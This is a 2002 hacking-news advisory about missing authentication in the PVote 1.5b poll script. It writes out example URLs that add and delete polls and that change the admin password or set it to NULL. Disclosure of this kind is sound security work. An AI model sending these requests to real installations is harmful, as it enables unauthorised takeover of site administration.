Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » PVote 1.5b - Multiple vulnerabilities

PVote 1.5b - Multiple vulnerabilities

by Nikola Strahija on April 18th, 2002 Scripts in the PVote package do not properly check valid authentication of the user and therefore let anyone add or delete polls. Also, there is a problem with the Admin password changing. Anyone can change it or set it to NULL.


Poll vulnerabilities:

  • Adding polls

  • http://www.server.com/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4
    =bad
    ... Where Question is the question, o1 to o4 are the options to choose from in the poll
  • Deleting stories

  • http://www.server.com/pvote/del.php?pollorder=1
    Pollorder is the poll 'id' number.

Changing Admin password:
  • Changing to the desired password:

  • http://www.server.com/pvote/ch_info.php?newpass=owned&confirm=owned
    where newpass and confirm have to be the same as the password you want to change to.
  • Changing Admin password to NULL

  • http://www.server.com/pvote/ch_info.php
    without any variables passed.


- Poorly written script. I suggest you some other script. You can find some on www.hotscripts.com

Some portions of this vulnerability elaboration has been taken off Daniel Nyström's advisory (http://www.telhack.com/).


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »